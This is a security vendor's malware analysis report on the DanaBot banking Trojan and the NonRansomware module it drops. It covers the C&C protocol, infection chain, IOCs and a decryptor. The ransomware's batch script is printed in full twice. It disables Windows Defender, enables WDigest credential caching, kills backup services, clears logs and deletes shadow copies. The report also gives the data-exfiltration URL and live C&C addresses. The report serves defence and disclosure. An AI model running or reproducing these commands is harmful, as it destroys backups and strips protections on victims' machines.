# DanaBot Demands a Ransom Payment **research.checkpoint.com/danabot-demands-a-ransom-payment/** June 20, 2019 Research by: Yaroslav Harakhavik and Aliaksandr Chailytko June 20, 2019 [It’s been over a year since DanaBot was first discovered, and its developers are still working to improve it and find new](https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0) opportunities to collaborate with other malware actors. Check Point Research has been tracking DanaBot campaigns since August 2018 and recently discovered that some bots belonging to European campaigns had started dropping an executable file which turned out to be a ransomware written in Delphi. [DanaBot was already involved in sending spam and cooperating with GootKit in the past, as well as dropping Remcos](https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/) RAT on infected machines. While DanaBot is still actively supported, its operators now add new plugins and configuration files and update various parts of the malware (including string encryption and file name generation algorithms, and even the communication protocol). In the following report, we will review the latest updates in DanaBot’s functionality, and take a deep dive into the inner[workings and encryption methods of this new ransomware.](https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-ransomware/) **DanaBot Overview** DanaBot is a banking Trojan which is distributed using phishing emails. Links usually lead to either a JavaScript or PowerShell dropper. ----- The malware has the following capabilities: Stealing browsers and FTP clients credentials Collecting crypto wallets credentials Running a proxy on an infected machine Performing Zeus-style web-injects Taking screenshots and recording video Providing a remote control via RDP or VNC Requesting updates via TOR Bypassing UAC using a WUSA exploit Requesting updates from C&C server and execute commands All DanaBot versions communicate with the C&C server via a custom TCP-based protocol over 443 port. Since its first appearance, DanaBot has spread throughout Europe, Australia, New Zealand, USA and Canada. Several [campaigns were discovered which target different countries. A campaign is defined by two hardcoded values:](https://www.netscout.com/blog/asert/danabots-travels-global-perspective) Campaign ID; Campaign salt – A number used for a packet validation by the C&C server Campaigns which are currently active are shown in Table 1. **Campaign ID** **Campaign Salt** **Countries** **2** 586856666 None **3** 897056567 Italy, Poland **4** 645456234 Australia **5** 423676934 Australia **6** 235791346 Australia **7** 765342789 Italy, Poland **8** 342768343 Canada, USA **9** 909445453 None **11** 445577321 Unknown **14** 653345567 Canada **15** 655222455 Poland, USA **17** 878777777 Unknown **18** 234456788 Unknown **19** 335347974 Unknown **20** 113334444 Unknown **24** 784356646 Unknown _Table 1 – Active DanaBot campaigns_ **The Dropper** The initial infection vector is usually an email with a document or a link which leads to a malicious dropper. ----- One of the latest cases is a new Australian campaign (ID 6) which was discovered by Check Point in April 2019. DanaBot was spread in its usual way – phishing emails with links to a file uploaded to Google Docs. **Fig 1: Phishing email examples** The downloaded file turned out to be a VBS script which functions as a DanaBot dropper. The dropper unpacks the DanaBot downloader DLL into the %TEMP% directory and registers it as a service. ----- **Fig 2: DanaBot VBS dropper** **DanaBot Downloader** The DanaBot downloader is represented by a 32- or 64-Bit DLL which starts by calling its f0 function. After the January 2019 update, the downloader took on many of the main module’s roles: for example, it bypasses UAC and pretends to be a Windows System Event Notification Service. It communicates with C&C servers, downloads DanaBot plugins and configuration files, updates itself, and executes the main module. In January, the DanaBot downloader changed its communication protocol, obscuring it with the AES256 encryption. [The new protocol was described in detail by ESET. The initial communication between an infected machine and a C&C](https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication) server is shown in Figure 3. The main points of the new protocol are: 1. Both the bot and C&C server generate a new AES256 key (AesKey in Figure 1) for every packet they send. 2. The bot sends an RSA public key (RsaSessionKey in Figure 1) to the C&C server which is used by the server to encrypt its generated AesKeys. 3. The bot encrypts the generated AesKeys with a hardcoded public RSA key (HardcodedRsaKey in Figure 1). The private key is owned exclusively by the C&C server. ----- **Fig 3: Encryption in Bot-to-C&C communication protocol** The layout of TCP packets for the latest communication protocol is decribed in the Appendix A. The DanaBot downloader can be detected by a public RSA key hardcoded into the DLL’s body. It’s usually XOR’ed with a byte in the range [0x01; 0xFF]. **Fig 4: The downloader’s hardcoded RSA public key** The new campaign sample requests the following modules and configuration files: Modules: **Main module** **Stealer plugin** **VNC plugin** **RDP plugin** ----- **TOR plugin** Configuration files: **BitVideo – Process list to record** **BitFiles – List of cryptocurrency files** **KeyProcess – Process list for keylogging** **PFilter – List of web-sites for sniffing** **Inject (or inject, inj, inj* or in*) – Web-inject configuration** **Redirect (redik*) – Configuration for redirection** **NonRansomware Distribution** At the end of April, DanaBot C&C server 95.179[.]186[.]57 started including in the list of available modules a new module, D932613F6447F0C56744B1AD53230C62 for a European campaign with ID=7. The module, which was an executable file written in Delphi, was named “crypt.” The new module turned to be a variant of the “NonRansomware” ransomware which enumerates files on local drives and encrypts all of them except the Windows directory. The encrypted files have a .non extension. A ransom message HowToBackFiles.txt is placed in each directory which contains encrypted files. [In the beginning of May, this ransomware was found in the Wild.](https://twitter.com/GrujaRS/status/1127880133631549441) **Fig 5: Ransom message** After its execution, the malware puts a batch file b.bat in %TEMP% and runs it. The batch script contains the following content: @echo off set “__COMPAT_LAYER=RunAsInvoker” reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management” /v ClearPageFileAtShutDown /t REG_DWORD /d 1 /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v Hidden /t REG_DWORD /d 1 /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v SuperHidden /t REG_DWORD /d 1 /f ----- reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest” /v UseLogonCredential /t REG_DWORD /d 1 /f net stop mssqlserver net stop sqlwriter net stop VeeamEndpointBackupSvc net stop mssqlfdlauncher net stop cpqvcagent net stop TeamViewer net stop klsbackup2013pro net stop foxitreaderservice net stop mysql net stop mssqlserver net stop mysql501 net stop veeamdeploysvc net stop veeamtransportsvc net stop wuauserv net stop sysmgmthp net stop sysdown net stop adobearmservice net stop themes net stop sqlbrowser net stop sql backupmaster net stop sqlagent$sql2008exp net stop sqltelemetry$sqlexpress net stop mssql$sqlexpress net stop mikroclientwservice net stop reportserver net stop sqlserveragent net stop MSSQL$MIKRO ----- net stop msdtc net stop sqltelemetryvv taskkill /F /IM Veam.EndPoint.Tray.exe taskkill /F /IM jusched.exe taskkill /F /IM jucheck.exe taskkill /F /IM IAStorDataMgrSvc.exe taskkill /F /IM IAStorIcon.exe taskkill /F /IM isa.exe taskkill /F /IM armsvc.exe taskkill /F /IM TeamViewer.exe taskkill /F /IM TeamViewer_Service.exe taskkill /F /IM tv_w32.exe taskkill /F /IM tv_x64.exe powercfg.exe -h off RD /S /Q “C:\Windows\Temp\” RD /S /Q “C:\Windows\Logs\” RD /S /Q “C:\Windows\Installer\” powershell.exe -ExecutionPolicy Bypass Disable-ComputerRestore “C:\” Disable-ComputerRestore “D:\” Disable-ComputerRestore “E:\” Disable-ComputerRestore “F:\” Disable-ComputerRestore “H:\” Clear-EventLog “Windows PowerShell” Clear-RecycleBin -Confirm:$false vssadmin delete shadows /all The scripts is responsible for: Enabling setting for showing hidden files Disabling Windows Defender Enabling ClearPageFileAtShutDown to purge the pagefile.sys Stopping services Stopping monitoring software (Veeam, TeamViewer, etc.) Disabling hibernation Removing logs ----- Bypassing the PowerShell Execution Policy Disabling restoration for the following logical disks: C, D, E, F, H; Clearing EventLog and Recycle Bin Deleting shadow copies for all volumes Then the malware schedules a task which will execute the malware every 14 minutes. The full command line for schtasks.exe is shown in Figure 6. **Fig 6: Ransomware task creation** The obscured name of the task is just a damaged string “SysUtils.” The malware uses a simple algorithm and a hardcoded key “Hello World!” to decrypt the strings. The developers – deliberately or not – applied this algorithm to a plain string to create a task name. Fig 7: Decrypting schtasks.exe parameters and damaging the task name by the same decryption algorithm The string decryption algorithm is shown in Figure 8. **Fig 8: Decrypting strings that are used in the ransomware source code** The ransomware enumerates logical drives, visits all the directories except Windows, and encrypts all the files using AES128. The password is a string representation of the system volume serial number. Every file is encrypted in a separate thread. The victim ID which is shown in the ransom message is generated from the password (i.e. C disk serial number) according to the following algorithm: **Fig 9: Victim ID generation algorithm** Basically, this can be rewritten as the following equation: ----- where – encryption key, – plain text, – cipher text and – text index. As it is impossible to create an inverse function for this equation, it is likely that the malware operators have to bruteforce the password (p) on the basis of the known victim ID (c) and hardcoded key (k). The following code can be used to restore the password from the victim ID: **Fig 10: Restoring the password by the victim ID** The encryption itself is not obvious unless… it was copy-pasted from the unit tests of the [DelphiEncryptionCompendium (DEC) library. The encryption function is a slightly modified DemoCipherFile procedure](https://github.com/decfpc/DelphiEncryptionCompendium/tree/master/DECTest) of the library’s test project. The main difference is using Panama hash instead of SHA1. A comparison of the disassembly code of the ransomware and the corresponding source code of DEC test project is shown in Figures 11-12. ----- Fig 11: Ransomware: Objects initialization **Fig 12: DEC: Objects initialization** There is a very detailed description of the encryption process in the source code. ----- **Fig 13: Comments for EncodeFile** So the only thing that is needed to restore the encrypted files is to call the DecodeFile function for all the encrypted files with a password bruteforced using the known victim ID. A GUI tool for file decryption is attached at the end of this article. The layout of an encrypted file and its structure are shown in Figure 14 and Table 2. Fig 14: Encrypted file layout **Field** **Size** **Cipher Identity** 4 Bytes **CipherMode** 1 Byte **Hash Identity** 3 Bytes **Seed Size** 1 Byte **Seed** Seed Size **Cipher Text Size** 4 Bytes **Cipher Text** Cipher Text Size **Checksum Size** 4 Bytes **Checksum** Checksum Size Table 2: The structure of an encrypted file ----- Finally, the malware checks a network connection and sends information about the infected PC to encrypter[.]webfoxsecurity[.]com. It first detects the version of Windows, generates a unique ID, retrieves the user name and builds the following string: {“#ersio.”:”1.4.3″, “win”:””, “hwid”:””, “UserName”:”User”, “Admin”:”0″} Example: {“#ersio.”:”1.4.3″, “win”:”Windows 7 Professional 32-bit”, “hwid”:”00029646″, “UserName”:”User”, “Admin”:”0″} UNIQUE_ID is generated based either on UUID (by using UuidCreateSequential) or on a volume serial number if _UuidCreateSequential failed._ The resulting string is encoded to Base64 and is sent to the previously mentioned address by using a GET request in the following format: http:[/]/encrypter[.]webfoxsecurity[.]com/api/key?k= **Conclusion** For almost a year, DanaBot has been extending its capabilities and evolving into a more sophisticated threat. We assume its operators will continue to add more improvements. Check Point provides a protection from these threats. We’ll keep an eye on it and update you further. A lot of ransomware still remain a relatively stable source of income for cyber criminals. Therefore such simple “copypaste” encryptors as the one that was described here will continue to emerge constantly. Note – In general, we do not recommend paying ransom to decrypt your files, and especially not in a case like this. **Appendix A. DanaBot Downloader’s payload packet layout** The unencrypted packet layout and the meaning of its fields are shown in Figure 15 and Table 3. Fig 15: Unencrypted initial payload packet layout Table 3: Packet layout **Offset** **Size** **Purpose** **0x00** 0x04 Packet header size (0xA7) **0x04** 0x08 Random number (rand_1) **0x0C** 0x08 Sum of header size and rand_1 **0x14** 0x04 Campaign ID **0x18** 0x04 Message ID **0x1C** 0x04 Message parameter ----- **0x20** 0x04 Random number (rand_2) **0x24** 0x04 Constant (0x00) **0x28** 0x04 Architecture (32, 64) **0x2C** 0x04 Windows version token **0x30** 0x04 0 or 0x03E9 (depends on Message ID) **0x34** 0x04 Constant (0x01) **0x38** 0x04 Admin status **0x3C** 0x08 Constant (0x01) **0x44** 0x01 Border **0x45** 0x20 Bot ID **0x65** 0x01 Border **0x66** 0x20 Module or Checksum #1 (depends on Message ID) **0x86** 0x01 Border **0x87** 0x20 Checksum #2 Checksum #1 is required only in certain requests, such as an initial request when a bot communicates with the C&C server to announce its presence. Checksum #2 is placed at the end of every payload that the bot sends to the C&C server. Checksums are calculated by the following formulas: The encrypted packet is preceded by a 24-byte header. The first 8 bytes contain the size of payload packet, the next 8 bytes contain a random 2-byte number, and the last 8 bytes are equal to the sum of the payload size and the random number. **Fig 16: Example of a payload packet header** **Appendix B. DanaBot IOCs** **Alive C&C servers** **Status** **192.71.249.51** Alive **178.209.51.211** Alive **185.92.222.238** Down **89.144.25.104** Down **89.144.25.243** Alive **84.54.37.102** Down **149.28.180.182** Alive ----- **95.179.186.57** Alive **Droppers location on GoogleCloud** **hxxps://docs.google[.]com/uc?id=1q4EYE4umvEFfdlL4_IshSQ4UqnhWAg9t** **hxxps://docs.google[.]com/uc?id=1gu8efqkSDDXZIDMX2cnFc73NyyuVYIF0** **WebInject & Redirect IP and domains** **194.76.225.28** **185.189.149.235** **demo.maintrump.org** **kaosutdoaaf.pw** **kaosutdoaaf6.pw** **kaosjdoaaf6.pw** **kadosjdoaaf6.pw** **kadosjdoaf6.pw** **kadosjdoafa.pw** **kadosjdoiafa.pw** **kdosjdoiafa.pw** **kduwouewpew.pw** **kdguwoewpew.pw** **sfjskdjfwoiewwegroup.tech** **brekwinarew.site** **jklfsdkfjhwefjosdf.top** **jklfsdkfjhwefjosdf.xyz** **goskilindad.site** **mon-sta.com** **lindakiski.top** **lidaskiheg.space** **lnet4-data.com** **net4-data.com** **lidaskiheg.site** **bruksialopws.icu** **brukaisloap.club** **braksiolsa.top** **brukiloapos.xyz** ----- **oneuisopeweh.icu** **okjauwbueiws.xyz** **okjauwbueiws.top** **onueilsndsuywe.xyz** **gustemiaksa.icu** **thegiksjoute.online** **guksuoiew.top** **gustokiloe.xyz** **gousikolka.space** **thenautorern.tech** **nautorern.xyz** **kipokahynr.top** **kipokahynr.xyz** **muabolksae.club** **muoklaiow.xyz** **Examples of DanaBot modules** **Module** **MD5** **VBS Dropper** a1f119be2c55029f4d38f9356a1cc680 **Downloader (x86)** b0c1bdc0b21aa99e2d777eef39c18a11 **Downloader (x64)** 11e7e83043259310a5ae8689b4e34992 **Main module (x86)** ca8c3113b9afa9d8bb8fe1f6653a9547 **Main module (x64)** eacd1da520a33d842b09cef81606c745 **Plugin** **MD5** **Stealer (x86)** ee89e89b0ee8f5b3241e69b4a6632b00 **Stealer (x64)** 7efc6b42338b28470716c126a3c1cc46 **VNC** d917226cba970dcf3f2b7c59cf212221 **TOR** bcf4a4a96b6dacd026d507d0e49797C6 **RDPWrap** 0f54d5a13821c0e31eb5730a4aba75f2 **Appendix C. NonRansomware IOCs** **md5** **sha256** **a3629977d2c9f7eb30a13bdce14e3f45** 5dad162cbc990d3f45d2fe3b9d96ebd0c4af92997f621a207387201ed6b34893 **e48067d2ad6adcbf2e4cf7e705d4bd82** 8a21e1224a8f1d7dd9d4e42c78c829fb82808631577477e8f699f15feb7c8988 ----- **Spawned processes** C:\Users\ \AppData\Local\Temp\b.bat C:\Windows\System32\schtasks.exe /c /Create /SC MINUTE /MO 14 /TN \xc3\xab\xc3\xb4\xc3\xa7\xc3\x89\xc3\xa5I\xc3\xb5\xc3\xa4 /TR “” /F **Dropped Files** C:\Windows\System32\cmd.exe /c %TEMP%\b.bat \HowToBackFiles.txt **Network** https://encrypter.webfoxsecurity.com/api/key?k= **Mutexes** RunningNow **Strings** [[email protected]](https://research.checkpoint.com/cdn-cgi/l/email-protection) HowToBackFiles.txt @echo off set “__COMPAT_LAYER=RunAsInvoker” reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management” /v ClearPageFileAtShutDown /t REG_DWORD /d 1 /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v Hidden /t REG_DWORD /d 1 /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v SuperHidden /t REG_DWORD /d 1 /f reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced” /v ShowSuperHidden /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest” /v UseLogonCredential /t REG_DWORD /d 1 /f net stop mssqlserver net stop sqlwriter net stop VeeamEndpointBackupSvc net stop mssqlfdlauncher net stop cpqvcagent net stop TeamViewer net stop klsbackup2013pro ----- net stop foxitreaderservice net stop mysql net stop mssqlserver net stop mysql501 net stop veeamdeploysvc net stop veeamtransportsvc net stop wuauserv net stop sysmgmthp net stop sysdown net stop adobearmservice net stop themes net stop sqlbrowser net stop sql backupmaster net stop sqlagent$sql2008exp net stop sqltelemetry$sqlexpress net stop mssql$sqlexpress net stop mikroclientwservice net stop reportserver net stop sqlserveragent net stop MSSQL$MIKRO net stop msdtc net stop sqltelemetryvv taskkill /F /IM Veam.EndPoint.Tray.exe taskkill /F /IM jusched.exe taskkill /F /IM jucheck.exe taskkill /F /IM IAStorDataMgrSvc.exe taskkill /F /IM IAStorIcon.exe taskkill /F /IM isa.exe taskkill /F /IM armsvc.exe taskkill /F /IM TeamViewer.exe taskkill /F /IM TeamViewer_Service.exe taskkill /F /IM tv_w32.exe taskkill /F /IM tv_x64.exe powercfg.exe -h off ----- RD /S /Q “C:\Windows\Temp\” RD /S /Q “C:\Windows\Logs\” RD /S /Q “C:\Windows\Installer\” powershell.exe -ExecutionPolicy Bypass Disable-ComputerRestore “C:\” Disable-ComputerRestore “D:\” Disable-ComputerRestore “E:\” Disable-ComputerRestore “F:\” Disable-ComputerRestore “H:\” Clear-EventLog “Windows PowerShell” Clear-RecycleBin -Confirm:$false vssadmin delete shadows /all **Appendix D. Check Point Signatures** **Malware** **CP Product** **Detect Name** **DanaBot** Anti-Bot Trojan.Win32.DanaBot.* Thread Emulation Trojan.Win.DanaBot.A Sand Blast Agent Trojan.Win.DanaBot.B **NonRansomware** Anti-Ransomware Ransomware.Win.TouchTrapFiles.A Sand Blast Agent Gen.Win.DisWinDef.A **Decryption tool** [Click here to download the NonDecryptor tool.](https://research.checkpoint.com/wp-content/uploads/2019/06/NonDecryptor.zip) -----